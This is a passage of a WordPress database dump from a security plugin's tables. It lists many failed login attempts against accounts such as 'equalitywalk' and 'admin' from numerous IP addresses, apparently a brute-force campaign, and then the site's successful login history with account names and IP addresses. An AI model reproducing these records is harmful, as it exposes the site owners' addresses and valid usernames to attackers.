05:23:15','158.58.187.51'),(8245,0,'equalitywalk','2021-09-15 05:29:01','34.68.97.70'),(8246,1,'admin','2021-09-15 05:29:53','104.207.146.195'),(8247,0,'equalitywalk','2021-09-15 05:36:19','91.206.200.252'),(8248,1,'admin','2021-09-15 05:37:49','185.8.129.188'),(8249,0,'equalitywalk','2021-09-15 05:40:17','64.225.70.87'),(8250,0,'equalitywalk','2021-09-15 05:43:24','64.227.12.160'),(8251,0,'demo','2021-09-15 05:46:27','144.168.230.162'),(8252,0,'equalitywalk','2021-09-15 05:50:47','193.19.240.121'),(8253,0,'equalitywalk','2021-09-15 05:51:44','68.183.68.148'),(8254,1,'Admin','2021-09-15 05:53:07','203.137.115.113'),(8255,0,'equalitywalk','2021-09-15 05:59:40','47.114.3.188'),(8256,0,'equalitywalk','2021-09-15 06:02:28','54.39.105.88'),(8257,0,'equalitywalk','2021-09-15 06:07:36','69.163.251.1'),(8258,0,'test','2021-09-15 06:10:31','103.121.89.184'),(8259,0,'equalitywalk','2021-09-15 06:14:38','77.68.119.124'),(8260,0,'equalitywalk','2021-09-15 06:15:28','95.179.165.240'),(8261,0,'demo','2021-09-15 06:17:43','52.66.5.66'),(8262,0,'equalitywalk','2021-09-15 06:23:36','79.101.44.3'),(8263,0,'demo','2021-09-15 06:25:28','78.157.60.70'),(8264,0,'equalitywalk','2021-09-15 06:31:30','162.214.121.146'),(8265,1,'admin','2021-09-15 06:35:18','139.59.83.248'),(8266,0,'equalitywalk','2021-09-15 06:35:43','185.137.220.77'),(8267,0,'equalitywalk','2021-09-15 06:39:32','185.2.4.200'),(8268,1,'admin','2021-09-15 06:42:29','185.2.6.13'),(8269,0,'equalitywalk','2021-09-15 06:46:23','104.37.86.32'),(8270,0,'equalitywalk','2021-09-15 06:46:55','178.128.54.239'),(8271,0,'test','2021-09-15 06:52:13','185.223.95.54'),(8272,0,'equalitywalk','2021-09-15 06:55:44','170.210.156.52'),(8273,0,'equalitywalk','2021-09-15 06:57:16','155.94.163.77'),(8274,0,'equalitywalk','2021-09-15 07:03:11','62.210.113.228'),(8275,1,'admin','2021-09-15 07:06:09','103.237.145.122'),(8276,0,'equalitywalk','2021-09-15 07:10:08','52.87.138.147'),(8277,0,'equalitywalk','2021-09-15 07:11:29','13.36.110.241'),(8278,0,'test_999','2021-09-15 07:13:09','18.142.154.77'),(8279,0,'equalitywalk','2021-09-15 07:19:59','37.156.145.147'),(8280,0,'equalitywalk','2021-09-15 07:21:29','37.139.13.163'),(8281,0,'gluetest','2021-09-15 07:22:34','51.79.180.244'),(8282,0,'equalitywalk','2021-09-15 07:27:28','157.245.107.81'),(8283,1,'admin','2021-09-15 07:29:46','165.227.129.197'),(8284,0,'equalitywalk','2021-09-15 07:32:35','51.75.200.183'),(8285,0,'equalitywalk','2021-09-15 07:35:51','47.254.216.219'),(8286,1,'Admin','2021-09-15 07:37:05','173.212.212.254'),(8287,0,'equalitywalk','2021-09-15 07:43:58','150.95.112.79'),(8288,0,'equalitywalk','2021-09-15 07:44:12','136.144.190.69'),(8289,0,'wakgos','2021-09-15 07:45:34','34.96.163.227'),(8290,0,'equalitywalk','2021-09-15 07:51:34','51.81.245.120'),(8291,1,'admin','2021-09-15 07:52:37','171.244.50.60'),(8292,0,'equalitywalk','2021-09-15 07:55:50','51.210.102.191'),(8293,0,'equalitywalk','2021-09-15 08:00:24','157.230.164.216'),(8294,1,'admin','2021-09-15 08:09:14','173.212.212.254'),(8295,0,'equalitywalk','2021-09-15 08:09:33','103.15.232.195'),(8296,0,'equalitywalk','2021-09-15 08:11:34','45.124.84.40'),(8297,0,'patricia','2021-09-15 08:15:51','111.90.135.130'),(8298,0,'equalitywalk','2021-09-15 08:16:36','128.199.100.255'),(8299,0,'equalitywalk','2021-09-15 08:20:51','223.25.100.138'),(8300,0,'wordcamp','2021-09-15 08:28:15','5.188.62.140'),(8301,0,'equalitywalk','2021-09-15 08:32:36','213.189.58.137'),(8302,0,'equalitywalk','2021-09-15 08:34:17','195.93.152.83'),(8303,0,'iranavada','2021-09-15 08:37:40','52.22.231.34'),(8304,0,'equalitywalk','2021-09-15 08:42:54','109.175.24.5'),(8305,0,'equalitywalk','2021-09-15 08:43:53','177.55.111.14'),(8306,1,'admin','2021-09-15 08:44:44','176.112.192.25'),(8307,0,'testadmin','2021-09-15 08:51:17','195.154.87.159'),(8308,0,'equalitywalk','2021-09-15 08:51:22','120.79.29.217'),(8309,0,'equalitywalk','2021-09-15 08:55:16','194.233.70.173'),(8310,1,'admin','2021-09-15 08:58:47','108.175.5.114'),(8311,0,'equalitywalk','2021-09-15 08:59:19','138.197.4.141'),(8312,0,'keir','2021-09-15 09:06:00','206.189.46.147'),(8313,0,'adminlin','2021-09-15 09:07:40','5.188.62.140'),(8314,0,'equalitywalk','2021-09-15 09:09:05','23.29.80.56'),(8315,0,'dexter','2021-09-15 09:12:57','185.182.57.100'),(8316,0,'equalitywalk','2021-09-15 09:17:38','159.89.51.228'),(8317,0,'HelloRDP123','2021-09-15 09:19:51','77.68.17.32'),(8318,0,'equalitywalk','2021-09-15 09:25:49','5.200.91.6'),(8319,1,'admin','2021-09-15 09:26:58','136.243.92.92'),(8320,0,'equalitywalk','2021-09-15 09:34:42','51.81.245.120'),(8321,0,'equalitywalk','2021-09-15 09:43:26','47.114.3.188'),(8322,0,'equalitywalk','2021-09-15 09:44:52','213.189.58.137'),(8323,0,'equalitywalk','2021-09-15 09:52:45','144.91.105.135'),(8324,0,'equalitywalk','2021-09-15 09:55:50','203.205.21.168'),(8325,0,'equalitywalk','2021-09-15 10:01:36','23.29.80.56'),(8326,0,'equalitywalk','2021-09-15 10:10:24','34.116.245.127'),(8327,0,'equalitywalk','2021-09-15 10:10:32','148.72.211.177'),(8328,0,'equalitywalk','2021-09-15 10:19:38','62.210.209.245'),(8329,0,'equalitywalk','2021-09-15 10:22:09','185.137.220.77'),(8330,0,'equalitywalk','2021-09-15 10:28:25','194.87.190.39'),(8331,0,'equalitywalk','2021-09-15 10:37:34','64.235.231.20'),(8332,0,'equalitywalk','2021-09-15 10:45:47','166.62.125.246'),(8333,0,'equalitywalk','2021-09-15 10:46:42','34.68.97.70'),(8334,0,'equalitywalk','2021-09-15 10:55:16','162.0.208.15'),(8335,0,'equalitywalk','2021-09-15 10:57:40','195.93.152.83'),(8336,0,'equalitywalk','2021-09-15 11:04:23','72.167.41.152'),(8337,0,'equalitywalk','2021-09-15 11:11:45','74.208.87.43'),(8338,0,'equalitywalk','2021-09-15 11:13:32','103.116.16.173'),(8339,0,'equalitywalk','2021-09-15 11:22:32','5.101.157.43'),(8340,0,'equalitywalk','2021-09-15 11:23:12','72.167.42.12'),(8341,0,'equalitywalk','2021-09-15 11:31:16','159.89.1.19'),(8342,0,'equalitywalk','2021-09-15 11:34:22','157.245.71.228'),(8343,0,'equalitywalk','2021-09-15 11:39:57','45.224.131.194'),(8344,0,'equalitywalk','2021-09-15 11:45:20','51.210.107.150'),(8345,0,'equalitywalk','2021-09-15 11:50:05','167.99.12.47'),(8346,0,'equalitywalk','2021-09-15 11:59:17','162.241.69.46'),(8347,0,'equalitywalk','2021-09-15 12:08:23','109.115.162.166'),(8348,0,'equalitywalk','2021-09-15 12:09:47','188.166.94.198'),(8349,0,'equalitywalk','2021-09-15 12:20:55','51.195.176.80'),(8350,0,'equalitywalk','2021-09-15 12:27:04','116.255.173.135'),(8351,0,'equalitywalk','2021-09-15 12:31:51','34.134.49.192'),(8352,0,'equalitywalk','2021-09-15 12:35:41','128.199.123.63'),(8353,0,'equalitywalk','2021-09-15 12:42:59','209.250.239.96'),(8354,0,'equalitywalk','2021-09-15 12:45:37','107.180.88.164'),(8355,0,'equalitywalk','2021-09-15 12:54:12','47.242.61.245'),(8356,0,'equalitywalk','2021-09-15 12:55:07','3.106.8.12'),(8357,0,'equalitywalk','2021-09-15 13:04:20','144.126.132.64'),(8358,0,'equalitywalk','2021-09-15 13:13:29','159.89.51.228'),(8359,0,'equalitywalk','2021-09-15 13:23:01','185.182.57.49'),(8360,0,'equalitywalk','2021-09-15 13:23:30','165.22.12.238'),(8361,0,'[login]','2021-09-15 13:23:31','165.22.12.238'),(8362,0,'equalitywalk','2021-09-15 13:31:02','206.189.23.28'),(8363,0,'equalitywalk','2021-09-15 13:32:46','52.163.119.37'),(8364,0,'equalitywalk','2021-09-15 13:38:01','5.189.170.104'),(8365,0,'equalitywalk','2021-09-15 13:42:09','207.148.117.214'),(8366,0,'equalitywalk','2021-09-15 13:42:29','167.172.56.36'),(8367,0,'equalitywalk','2021-09-15 13:51:23','164.68.99.251'),(8368,0,'equalitywalk','2021-09-15 13:53:07','217.112.83.230'),(8369,0,'equalitywalk','2021-09-15 13:53:29','45.32.126.80'),(8370,0,'[login]','2021-09-15 13:53:31','45.32.126.80'),(8371,0,'equalitywalk','2021-09-15 14:00:56','35.231.49.189'),(8372,0,'equalitywalk','2021-09-15 14:09:09','124.217.255.60'),(8373,0,'equalitywalk','2021-09-15 14:10:45','120.53.235.9'),(8374,0,'equalitywalk','2021-09-15 14:11:22','139.59.154.27'),(8375,0,'equalitywalk','2021-09-15 14:19:45','162.214.118.72'),(8376,0,'equalitywalk','2021-09-15 14:24:24','34.66.184.130'),(8377,0,'equalitywalk','2021-09-15 14:25:43','165.22.13.69'),(8378,0,'equalitywalk','2021-09-15 14:29:56','34.94.247.253'),(8379,0,'equalitywalk','2021-09-15 14:39:29','161.97.178.213'),(8380,0,'equalitywalk','2021-09-15 14:41:19','45.88.110.148'),(8381,0,'equalitywalk','2021-09-15 14:49:13','178.62.77.224'),(8382,0,'equalitywalk','2021-09-15 14:50:11','188.166.94.198'),(8383,0,'equalitywalk','2021-09-15 14:57:06','77.68.17.32'),(8384,0,'[login]','2021-09-15 14:57:11','77.68.17.32'),(8385,0,'equalitywalk','2021-09-15 14:58:13','45.119.83.250'),(8386,0,'equalitywalk','2021-09-15 15:03:48','167.86.87.87'),(8387,0,'equalitywalk','2021-09-15 15:08:34','27.124.127.178'),(8388,0,'equalitywalk','2021-09-15 15:13:04','103.130.213.36'),(8389,0,'equalitywalk','2021-09-15 15:17:50','13.74.248.236'),(8390,0,'equalitywalk','2021-09-15 15:19:46','116.203.153.241'),(8391,0,'equalitywalk','2021-09-15 15:27:41','64.37.52.2'),(8392,0,'equalitywalk','2021-09-15 15:28:42','176.126.165.66'),(8393,0,'equalitywalk','2021-09-15 15:34:44','178.151.64.197'),(8394,0,'equalitywalk','2021-09-15 15:37:12','167.99.93.228'),(8395,0,'equalitywalk','2021-09-15 15:44:27','176.9.200.42'),(8396,0,'equalitywalk','2021-09-15 15:46:54','185.183.122.143'),(8397,0,'equalitywalk','2021-09-15 15:56:26','159.89.51.228'),(8398,0,'equalitywalk','2021-09-15 16:00:54','185.51.202.228'),(8399,0,'[login]','2021-09-15 16:00:55','185.51.202.228'),(8400,0,'equalitywalk','2021-09-15 16:15:10','103.27.35.102'),(8401,0,'equalitywalk','2021-09-15 16:17:25','82.64.255.120'),(8402,0,'equalitywalk','2021-09-15 16:18:55','103.15.232.195'),(8403,0,'equalitywalk','2021-09-15 16:49:32','51.15.160.22'),(8404,0,'equalitywalk','2021-09-15 17:03:21','45.12.32.57'),(8405,0,'equalitywalk','2021-09-15 17:20:36','195.201.42.236'),(8406,0,'equalitywalk','2021-09-15 17:27:14','41.208.72.154'),(8407,0,'[login]','2021-09-15 17:27:14','41.208.72.154'),(8408,0,'equalitywalk','2021-09-15 17:35:23','159.69.34.209'),(8409,0,'equalitywalk','2021-09-15 17:38:49','138.68.64.196'),(8410,0,'[login]','2021-09-15 17:38:54','138.68.64.196'),(8411,0,'equalitywalk','2021-09-15 17:53:04','182.254.156.95'),(8412,0,'[login]','2021-09-15 17:53:06','182.254.156.95'),(8413,0,'equalitywalk','2021-09-15 18:01:02','207.154.231.132'),(8414,0,'equalitywalk','2021-09-15 18:05:43','103.124.95.104'),(8415,0,'equalitywalk','2021-09-15 18:17:10','138.68.64.196'),(8416,0,'[login]','2021-09-15 18:17:10','138.68.64.196'),(8417,0,'equalitywalk','2021-09-15 18:17:25','161.97.112.157'),(8418,0,'equalitywalk','2021-09-15 18:30:07','103.28.49.63'),(8419,0,'equalitywalk','2021-09-15 18:30:08','82.196.12.203'),(8420,0,'[login]','2021-09-15 18:30:09','82.196.12.203'),(8421,0,'equalitywalk','2021-09-15 18:42:36','95.217.144.72'),(8422,0,'equalitywalk','2021-09-15 18:44:13','5.9.22.215'),(8423,0,'[login]','2021-09-15 18:44:13','5.9.22.215'),(8424,0,'equalitywalk','2021-09-15 18:54:44','188.166.94.198'),(8425,0,'equalitywalk','2021-09-15 19:08:43','185.2.4.71'),(8426,0,'equalitywalk','2021-09-15 19:22:36','176.126.165.66'),(8427,0,'[login]','2021-09-15 19:22:36','176.126.165.66'),(8428,0,'equalitywalk','2021-09-15 19:22:53','47.115.77.219'),(8429,0,'equalitywalk','2021-09-15 19:33:34','96.125.171.153'),(8430,0,'equalitywalk','2021-09-15 19:35:15','77.68.17.32'),(8431,0,'[login]','2021-09-15 19:35:16','77.68.17.32'),(8432,0,'equalitywalk','2021-09-15 19:48:41','91.126.176.51'),(8433,0,'equalitywalk','2021-09-15 20:00:57','108.170.55.202'),(8434,0,'[login]','2021-09-15 20:00:59','108.170.55.202'),(8435,0,'equalitywalk','2021-09-15 20:07:40','14.36.66.221'),(8436,0,'equalitywalk','2021-09-15 20:13:46','80.179.219.10'),(8437,0,'equalitywalk','2021-09-15 20:19:22','37.187.39.126'),(8438,0,'equalitywalk','2021-09-15 20:26:24','139.59.83.248'),(8439,0,'equalitywalk','2021-09-15 20:29:57','157.245.110.251'),(8440,0,'equalitywalk','2021-09-15 20:39:19','45.32.126.80'),(8441,0,'equalitywalk','2021-09-15 20:40:22','68.183.232.22'),(8442,0,'equalitywalk','2021-09-15 20:50:46','82.159.185.75'),(8443,0,'equalitywalk','2021-09-15 20:51:09','185.96.195.245'),(8444,0,'equalitywalk','2021-09-15 20:51:46','82.159.185.75'),(8445,0,'equalitywalk','2021-09-15 20:52:45','195.211.45.152'),(8446,0,'[login]','2021-09-15 20:52:45','195.211.45.152'),(8447,0,'equalitywalk','2021-09-15 20:53:48','82.159.185.75'),(8448,0,'equalitywalk','2021-09-15 21:01:55','185.2.4.33'),(8449,0,'equalitywalk','2021-09-15 21:04:57','178.62.100.74'),(8450,0,'equalitywalk','2021-09-15 21:17:14','67.220.184.130'),(8451,0,'[login]','2021-09-15 21:17:15','67.220.184.130'),(8452,0,'equalitywalk','2021-09-15 21:23:52','104.37.86.32'),(8453,0,'equalitywalk','2021-09-15 21:29:14','66.42.57.223'),(8454,0,'equalitywalk','2021-09-15 21:34:35','80.169.210.148'),(8455,0,'equalitywalk','2021-09-15 21:42:45','18.219.35.247'),(8456,0,'[login]','2021-09-15 21:43:05','18.219.35.247'),(8457,0,'equalitywalk','2021-09-15 21:45:11','3.144.83.24'),(8458,0,'equalitywalk','2021-09-15 21:53:48','82.159.185.75'),(8459,0,'equalitywalk','2021-09-15 21:54:48','82.159.185.75'),(8460,0,'equalitywalk','2021-09-15 21:55:31','212.110.92.155'),(8461,0,'equalitywalk','2021-09-15 21:55:49','82.159.185.75'),(8462,0,'equalitywalk','2021-09-15 22:08:13','78.157.60.70'),(8463,0,'[login]','2021-09-15 22:08:14','78.157.60.70'),(8464,0,'equalitywalk','2021-09-15 22:08:32','77.68.119.124'),(8465,0,'equalitywalk','2021-09-15 22:19:05','185.50.199.194'),(8466,0,'equalitywalk','2021-09-15 22:20:30','173.212.212.254'),(8467,0,'[login]','2021-09-15 22:20:31','173.212.212.254'),(8468,0,'equalitywalk','2021-09-15 22:29:49','85.208.22.223'),(8469,0,'equalitywalk','2021-09-15 22:32:19','139.59.117.65'),(8470,0,'[login]','2021-09-15 22:32:20','139.59.117.65'),(8471,0,'equalitywalk','2021-09-15 22:40:18','122.128.111.29'),(8472,0,'equalitywalk','2021-09-15 22:46:49','158.69.36.45'),(8473,0,'[login]','2021-09-15 22:46:49','158.69.36.45'),(8474,0,'equalitywalk','2021-09-15 22:51:01','37.187.39.126'),(8475,1,'admin','2021-09-15 22:56:49','82.159.185.75'),(8476,1,'admin','2021-09-15 22:57:50','82.159.185.75'),(8477,1,'admin','2021-09-15 22:58:51','82.159.185.75'),(8478,0,'equalitywalk','2021-09-15 22:59:48','80.172.227.64'),(8479,0,'[login]','2021-09-15 22:59:48','80.172.227.64'),(8480,0,'equalitywalk','2021-09-15 23:02:20','185.253.218.123'),(8481,0,'equalitywalk','2021-09-15 23:11:48','103.241.136.148'),(8482,0,'[login]','2021-09-15 23:11:50','103.241.136.148'),(8483,0,'equalitywalk','2021-09-15 23:14:36','143.244.161.193'),(8484,0,'equalitywalk','2021-09-15 23:24:56','195.93.152.83'),(8485,0,'equalitywalk','2021-09-15 23:26:09','51.255.85.98'),(8486,0,'equalitywalk','2021-09-15 23:35:27','138.68.248.47'),(8487,0,'equalitywalk','2021-09-15 23:45:46','45.40.132.156'),(8488,0,'equalitywalk','2021-09-15 23:52:28','104.207.146.195'),(8489,0,'[login]','2021-09-15 23:52:29','104.207.146.195'),(8490,0,'equalitywalk','2021-09-15 23:56:25','185.217.142.9'),(8491,1,'admin','2021-09-15 23:59:51','82.159.185.75'),(8492,1,'admin','2021-09-16 00:00:52','82.159.185.75'),(8493,1,'admin','2021-09-16 00:01:53','82.159.185.75'),(8494,0,'equalitywalk','2021-09-16 00:06:05','173.212.212.254'),(8495,0,'equalitywalk','2021-09-16 00:19:08','45.88.110.148'),(8496,0,'[login]','2021-09-16 00:19:08','45.88.110.148'),(8497,0,'equalitywalk','2021-09-16 00:30:58','104.198.1.26'),(8498,0,'equalitywalk','2021-09-16 00:32:40','34.93.37.156'),(8499,0,'[login]','2021-09-16 00:32:41','34.93.37.156'),(8500,0,'equalitywalk','2021-09-16 00:46:08','200.137.215.30'),(8501,0,'[login]','2021-09-16 00:46:09','200.137.215.30'),(8502,0,'equalitywalk','2021-09-16 00:51:04','20.69.208.30'),(8503,0,'equalitywalk','2021-09-16 00:59:33','119.18.48.111'),(8504,0,'[login]','2021-09-16 00:59:35','119.18.48.111'),(8505,0,'equalitywalk','2021-09-16 01:01:16','89.96.90.125'),(8506,0,'equalitywalk','2021-09-16 01:11:31','34.116.245.127'),(8507,0,'equalitywalk','2021-09-16 01:12:03','103.124.94.44'),(8508,0,'[login]','2021-09-16 01:12:05','103.124.94.44'),(8509,0,'equalitywalk','2021-09-16 01:21:32','103.90.232.219'),(8510,0,'equalitywalk','2021-09-16 01:31:42','35.238.155.231'),(8511,0,'equalitywalk','2021-09-16 01:38:53','216.37.42.50'),(8512,0,'[login]','2021-09-16 01:38:54','216.37.42.50'),(8513,0,'equalitywalk','2021-09-16 01:41:54','94.23.16.215'),(8514,0,'equalitywalk','2021-09-16 01:52:12','172.105.77.95'),(8515,0,'equalitywalk','2021-09-16 02:04:42','171.244.8.25'),(8516,0,'[login]','2021-09-16 02:04:44','171.244.8.25'),(8517,0,'equalitywalk','2021-09-16 02:13:11','34.126.146.135'),(8518,0,'equalitywalk','2021-09-16 02:17:44','196.41.122.224'),(8519,0,'[login]','2021-09-16 02:17:45','196.41.122.224'),(8520,0,'equalitywalk','2021-09-16 02:23:16','34.132.68.67'),(8521,0,'equalitywalk','2021-09-16 02:30:58','101.32.26.253'),(8522,0,'[login]','2021-09-16 02:30:59','101.32.26.253'),(8523,0,'equalitywalk','2021-09-16 02:33:25','213.189.58.137'),(8524,0,'equalitywalk','2021-09-16 02:43:30','113.161.196.20'),(8525,0,'equalitywalk','2021-09-16 02:53:31','45.40.166.142'),(8526,0,'equalitywalk','2021-09-16 03:10:25','136.243.92.92'),(8527,0,'[login]','2021-09-16 03:10:25','136.243.92.92'),(8528,0,'equalitywalk','2021-09-16 03:13:55','91.192.110.232'),(8529,1,'admin','2021-09-16 03:37:29','139.59.154.27'),(8530,1,'admin','2021-09-16 03:47:22','173.212.248.58'),(8531,0,'equalitywalk','2021-09-16 03:49:46','27.131.131.133'),(8532,0,'[login]','2021-09-16 03:49:48','27.131.131.133'),(8533,1,'admin','2021-09-16 03:57:13','213.189.58.137'),(8534,0,'equalitywalk','2021-09-16 04:01:32','104.207.146.195'),(8535,0,'[login]','2021-09-16 04:01:33','104.207.146.195'),(8536,1,'admin','2021-09-16 04:08:35','185.253.218.123'),(8537,0,'equalitywalk','2021-09-16 04:15:22','34.70.93.19'),(8538,0,'[login]','2021-09-16 04:15:23','34.70.93.19'),(8539,1,'admin','2021-09-16 04:19:24','213.189.58.137'),(8540,0,'equalitywalk','2021-09-16 04:28:37','77.68.17.32'),(8541,0,'[login]','2021-09-16 04:28:37','77.68.17.32'),(8542,0,'equalitywalk','2021-09-16 04:29:51','217.70.186.133'),(8543,0,'equalitywalk','2021-09-16 04:41:02','163.172.22.108'),(8544,0,'equalitywalk','2021-09-16 04:42:13','185.98.5.206'),(8545,0,'equalitywalk','2021-09-16 04:52:16','34.92.58.160'),(8546,0,'equalitywalk','2021-09-16 04:54:25','37.24.72.14'),(8547,0,'equalitywalk','2021-09-16 05:04:14','181.174.125.214'),(8548,0,'equalitywalk','2021-09-16 05:08:27','119.18.48.111'),(8549,0,'[login]','2021-09-16 05:08:28','119.18.48.111'),(8550,0,'equalitywalk','2021-09-16 05:17:20','95.128.43.176'),(8551,1,'admin','2021-09-16 05:43:09','195.93.152.83'),(8552,1,'admin','2021-09-16 05:55:03','161.35.208.18'),(8553,1,'admin','2021-09-16 06:16:43','161.35.208.18'),(8554,1,'admin','2021-09-16 06:27:45','167.172.175.147'),(8555,1,'admin','2021-09-16 06:37:42','54.165.125.60'),(8556,1,'admin','2021-09-16 06:47:45','83.150.213.37'),(8557,1,'admin','2021-09-16 06:57:49','187.51.127.28'),(8558,1,'admin','2021-09-16 07:08:07','47.115.77.219'),(8559,0,'equalitywalk','2021-09-16 07:18:18','185.238.73.122'),(8560,0,'equalitywalk','2021-09-16 07:28:31','45.40.166.141'),(8561,0,'equalitywalk','2021-09-16 07:38:40','136.144.190.69'),(8562,0,'equalitywalk','2021-09-16 07:48:39','51.15.27.8'),(8563,0,'equalitywalk','2021-09-16 07:58:48','188.166.187.223'),(8564,0,'equalitywalk','2021-09-16 08:09:40','52.87.138.147'),(8565,0,'equalitywalk','2021-09-16 08:20:07','51.68.210.115'),(8566,0,'equalitywalk','2021-09-16 08:30:32','103.6.244.158'),(8567,0,'equalitywalk','2021-09-16 08:40:49','178.128.113.244'),(8568,0,'equalitywalk','2021-09-16 08:50:52','51.178.31.87'),(8569,0,'equalitywalk','2021-09-16 09:01:12','136.144.175.119'),(8570,0,'equalitywalk','2021-09-16 09:11:47','162.144.126.104'),(8571,0,'equalitywalk','2021-09-16 09:21:54','34.126.146.135'),(8572,0,'equalitywalk','2021-09-16 09:32:09','45.40.132.156'),(8573,0,'equalitywalk','2021-09-16 09:42:33','52.76.84.216'),(8574,0,'equalitywalk','2021-09-16 09:53:01','81.88.52.154'),(8575,0,'equalitywalk','2021-09-16 10:04:53','45.40.166.141'),(8576,0,'equalitywalk','2021-09-16 10:16:49','45.12.32.57'),(8577,0,'equalitywalk','2021-09-16 10:38:54','3.249.7.127'),(8578,0,'equalitywalk','2021-09-16 10:49:23','185.217.142.9'),(8579,0,'equalitywalk','2021-09-16 10:59:37','149.56.142.233'),(8580,0,'equalitywalk','2021-09-16 11:11:29','192.81.211.136'),(8581,0,'equalitywalk','2021-09-16 11:21:59','41.93.40.83'),(8582,0,'equalitywalk','2021-09-16 11:32:21','103.121.89.184'),(8583,0,'equalitywalk','2021-09-16 11:42:59','104.131.68.67'),(8584,1,'admin','2021-09-16 11:43:15','34.134.92.241'),(8585,1,'admin','2021-09-16 11:43:16','34.134.92.241'),(8586,1,'admin','2021-09-16 11:43:17','34.134.92.241'),(8587,0,'equalitywalk','2021-09-16 12:26:16','209.97.169.15');
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_global_meta`
--

DROP TABLE IF EXISTS `wp_aiowps_global_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_global_meta` (
  `meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
  `date_time` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `meta_key1` varchar(255) NOT NULL,
  `meta_key2` varchar(255) NOT NULL,
  `meta_key3` varchar(255) NOT NULL,
  `meta_key4` varchar(255) NOT NULL,
  `meta_key5` varchar(255) NOT NULL,
  `meta_value1` varchar(255) NOT NULL,
  `meta_value2` text NOT NULL,
  `meta_value3` text NOT NULL,
  `meta_value4` longtext NOT NULL,
  `meta_value5` longtext NOT NULL,
  PRIMARY KEY (`meta_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_global_meta`
--

LOCK TABLES `wp_aiowps_global_meta` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_global_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_activity`
--

DROP TABLE IF EXISTS `wp_aiowps_login_activity`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_activity` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `logout_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_ip` varchar(100) NOT NULL DEFAULT '',
  `login_country` varchar(150) NOT NULL DEFAULT '',
  `browser_type` varchar(150) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=17 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_activity`
--

LOCK TABLES `wp_aiowps_login_activity` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_activity` DISABLE KEYS */;
INSERT INTO `wp_aiowps_login_activity` VALUES (1,1,'equalitywalk','2017-09-21 14:48:41','0000-00-00 00:00:00','86.129.51.82','',''),(2,1,'equalitywalk','2017-09-21 14:51:10','0000-00-00 00:00:00','86.129.51.82','',''),(3,1,'equalitywalk','2017-10-12 10:46:56','0000-00-00 00:00:00','217.206.184.92','',''),(4,1,'equalitywalk','2018-05-11 10:53:19','0000-00-00 00:00:00','185.175.113.75','',''),(5,1,'equalitywalk','2018-05-21 09:29:50','0000-00-00 00:00:00','185.175.113.75','',''),(6,1,'equalitywalk','2018-08-21 08:03:15','0000-00-00 00:00:00','185.175.113.75','',''),(7,1,'equalitywalk','2018-12-18 16:13:34','0000-00-00 00:00:00','185.175.113.75','',''),(8,1,'equalitywalk','2018-12-18 16:36:18','0000-00-00 00:00:00','185.175.113.75','',''),(9,1,'equalitywalk','2018-12-18 17:49:02','0000-00-00 00:00:00','185.175.113.75','',''),(10,1,'equalitywalk','2018-12-19 09:44:54','0000-00-00 00:00:00','185.175.113.75','',''),(11,1,'equalitywalk','2020-10-08 12:18:57','0000-00-00 00:00:00','185.175.113.72','',''),(12,1,'equalitywalk','2020-10-08 12:19:01','0000-00-00 00:00:00','185.175.113.72','',''),(13,1,'equalitywalk','2021-01-25 17:19:09','0000-00-00 00:00:00','37.188.32.3','',''),(14,1,'admin','2021-08-25 06:15:47','1000-10-10 10:00:00','103.70.171.126','',''),(15,1,'sd8s999ddx@@ )_','2021-09-16 12:42:42','1000-10-10 10:00:00','185.175.113.72','',''),(16,1,'sd8s999ddx@@ )_','2022-04-11 10:46:59','1000-10-10 10:00:00','185.175.113.72','','');
/*!40000 ALTER TABLE `wp_aiowps_login_activity` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_login_lockdown`
--

DROP TABLE IF EXISTS `wp_aiowps_login_lockdown`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_login_lockdown` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `lockdown_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `release_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `failed_login_ip` varchar(100) NOT NULL DEFAULT '',
  `lock_reason` varchar(128) NOT NULL DEFAULT '',
  `unlock_key` varchar(128) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=330 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_login_lockdown`
--

LOCK TABLES `wp_aiowps_login_lockdown` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_login_lockdown` DISABLE KEYS */;
